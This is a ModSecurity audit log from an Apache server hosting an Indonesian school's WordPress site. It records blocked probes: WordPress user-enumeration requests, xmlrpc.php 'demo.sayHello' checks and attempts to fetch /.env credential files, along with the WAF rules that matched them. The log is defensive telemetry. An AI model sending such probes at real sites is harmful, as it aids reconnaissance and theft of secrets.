Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747527406675957 2582 (- - -) Stopwatch2: 1747527406675957 2582; combined=1155, p1=397, p2=734, p3=0, p4=0, p5=24, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2d54ae3f-Z-- --7be03044-A-- [18/May/2025:07:17:20 +0700] aCknEEPRqak7bVuUS6fzfAAAAIA 103.236.140.4 55864 103.236.140.4 8181 --7be03044-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.105.94 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.105.94 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7be03044-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7be03044-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747527440959485 2497 (- - -) Stopwatch2: 1747527440959485 2497; combined=995, p1=341, p2=629, p3=0, p4=0, p5=25, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7be03044-Z-- --c09ff120-A-- [18/May/2025:07:17:31 +0700] aCknGhir-GlPrFVVKe4qJAAAAEU 103.236.140.4 56104 103.236.140.4 8181 --c09ff120-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.105.94 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.105.94 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c09ff120-C-- demo.sayHello --c09ff120-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c09ff120-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747527450995200 5144 (- - -) Stopwatch2: 1747527450995200 5144; combined=3682, p1=513, p2=2975, p3=30, p4=33, p5=78, sr=62, sw=53, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c09ff120-Z-- --c542b035-A-- [18/May/2025:07:20:55 +0700] aCkn51ewLfDrCkDGIGxGewAAANY 103.236.140.4 60710 103.236.140.4 8181 --c542b035-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.13.208.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.13.208.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c542b035-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c542b035-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747527655045840 2196 (- - -) Stopwatch2: 1747527655045840 2196; combined=1072, p1=302, p2=749, p3=0, p4=0, p5=21, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c542b035-Z-- --ddb1a42c-A-- [18/May/2025:07:24:08 +0700] aCkoqPypzAd0elWOk7og-AAAAAE 103.236.140.4 36766 103.236.140.4 8181 --ddb1a42c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 217.160.56.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 217.160.56.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ddb1a42c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ddb1a42c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747527848481661 3061 (- - -) Stopwatch2: 1747527848481661 3061; combined=1321, p1=425, p2=867, p3=0, p4=0, p5=29, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ddb1a42c-Z-- --3bb89f41-A-- [18/May/2025:07:34:31 +0700] aCkrF_ypzAd0elWOk7olJAAAAA0 103.236.140.4 51134 103.236.140.4 8181 --3bb89f41-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.183.203.62 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.183.203.62 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3bb89f41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3bb89f41-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747528471779664 15158 (- - -) Stopwatch2: 1747528471779664 15158; combined=26667, p1=437, p2=883, p3=0, p4=0, p5=12691, sr=114, sw=0, l=0, gc=12656 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3bb89f41-Z-- --9e66450e-A-- [18/May/2025:08:30:38 +0700] aCk4PvypzAd0elWOk7o69QAAAAA 103.236.140.4 52650 103.236.140.4 8181 --9e66450e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 70.39.75.187 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 70.39.75.187 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --9e66450e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9e66450e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747531838010640 831 (- - -) Stopwatch2: 1747531838010640 831; combined=333, p1=290, p2=0, p3=0, p4=0, p5=43, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9e66450e-Z-- --48024d37-A-- [18/May/2025:09:01:35 +0700] aCk_f1ewLfDrCkDGIGxcnQAAAMk 103.236.140.4 52810 103.236.140.4 8181 --48024d37-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 159.223.132.86 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 159.223.132.86 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --48024d37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --48024d37-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747533695842067 791 (- - -) Stopwatch2: 1747533695842067 791; combined=347, p1=309, p2=0, p3=0, p4=0, p5=38, sr=134, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48024d37-Z-- --a8996031-A-- [18/May/2025:10:29:57 +0700] aClUNUPRqak7bVuUS6cRTQAAAJY 103.236.140.4 53198 103.236.140.4 8181 --a8996031-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.173.27 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.173.27 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a8996031-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8996031-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747538997081746 3375 (- - -) Stopwatch2: 1747538997081746 3375; combined=1512, p1=512, p2=966, p3=0, p4=0, p5=34, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8996031-Z-- --71405626-A-- [18/May/2025:10:30:09 +0700] aClUQfypzAd0elWOk7o7MQAAAAE 103.236.140.4 53202 103.236.140.4 8181 --71405626-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.173.27 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.173.27 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --71405626-C-- demo.sayHello --71405626-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --71405626-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747539009786067 5035 (- - -) Stopwatch2: 1747539009786067 5035; combined=3794, p1=478, p2=3077, p3=22, p4=24, p5=110, sr=78, sw=83, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --71405626-Z-- --e57ce866-A-- [18/May/2025:10:36:56 +0700] aClV2EPRqak7bVuUS6cRUAAAAJQ 103.236.140.4 53216 103.236.140.4 8181 --e57ce866-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.77 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.77 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e57ce866-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e57ce866-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747539416633884 3507 (- - -) Stopwatch2: 1747539416633884 3507; combined=1546, p1=571, p2=943, p3=0, p4=0, p5=32, sr=157, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e57ce866-Z-- --56029231-A-- [18/May/2025:10:37:05 +0700] aClV4VewLfDrCkDGIGxctAAAAMY 103.236.140.4 53220 103.236.140.4 8181 --56029231-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.77 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.77 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --56029231-C-- demo.sayHello --56029231-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --56029231-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747539425124886 6020 (- - -) Stopwatch2: 1747539425124886 6020; combined=4312, p1=571, p2=3508, p3=31, p4=35, p5=98, sr=74, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --56029231-Z-- --bfd13941-A-- [18/May/2025:10:42:02 +0700] aClXCvypzAd0elWOk7o7NQAAAAQ 103.236.140.4 53266 103.236.140.4 8181 --bfd13941-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.87.171 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.87.171 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bfd13941-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bfd13941-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747539722327782 3319 (- - -) Stopwatch2: 1747539722327782 3319; combined=1445, p1=500, p2=912, p3=0, p4=0, p5=33, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bfd13941-Z-- --2863ef3d-A-- [18/May/2025:10:42:07 +0700] aClXD0PRqak7bVuUS6cRZQAAAJM 103.236.140.4 53270 103.236.140.4 8181 --2863ef3d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.87.171 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.87.171 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2863ef3d-C-- demo.sayHello --2863ef3d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2863ef3d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747539727314565 5367 (- - -) Stopwatch2: 1747539727314565 5367; combined=4050, p1=558, p2=3279, p3=25, p4=25, p5=95, sr=106, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2863ef3d-Z-- --1ad86656-A-- [18/May/2025:10:52:28 +0700] aClZfPypzAd0elWOk7o7OgAAAAo 103.236.140.4 53328 103.236.140.4 8181 --1ad86656-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.104.41 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.104.41 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1ad86656-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1ad86656-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747540348296987 3097 (- - -) Stopwatch2: 1747540348296987 3097; combined=1355, p1=496, p2=823, p3=0, p4=0, p5=35, sr=143, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1ad86656-Z-- --1bc7d366-A-- [18/May/2025:10:52:33 +0700] aClZgUPRqak7bVuUS6cRbgAAAIk 103.236.140.4 53332 103.236.140.4 8181 --1bc7d366-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.104.41 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.104.41 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1bc7d366-C-- demo.sayHello --1bc7d366-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1bc7d366-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747540353571767 5826 (- - -) Stopwatch2: 1747540353571767 5826; combined=4255, p1=558, p2=3455, p3=29, p4=32, p5=109, sr=75, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1bc7d366-Z-- --40c0fe5b-A-- [18/May/2025:11:01:05 +0700] aClbgUPRqak7bVuUS6cRdQAAAJM 103.236.140.4 53382 103.236.140.4 8181 --40c0fe5b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.88.89 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.88.89 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Accept-Charset: utf-8 --40c0fe5b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40c0fe5b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747540865844850 888 (- - -) Stopwatch2: 1747540865844850 888; combined=366, p1=323, p2=0, p3=0, p4=0, p5=43, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40c0fe5b-Z-- --340bb079-A-- [18/May/2025:11:01:13 +0700] aClbiRir-GlPrFVVKe5DhQAAAFg 103.236.140.4 53384 103.236.140.4 8181 --340bb079-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.88.89 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.88.89 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0) Gecko/20100101 Firefox/9.0 Accept-Charset: utf-8 --340bb079-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --340bb079-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747540873056682 869 (- - -) Stopwatch2: 1747540873056682 869; combined=317, p1=275, p2=0, p3=0, p4=0, p5=42, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
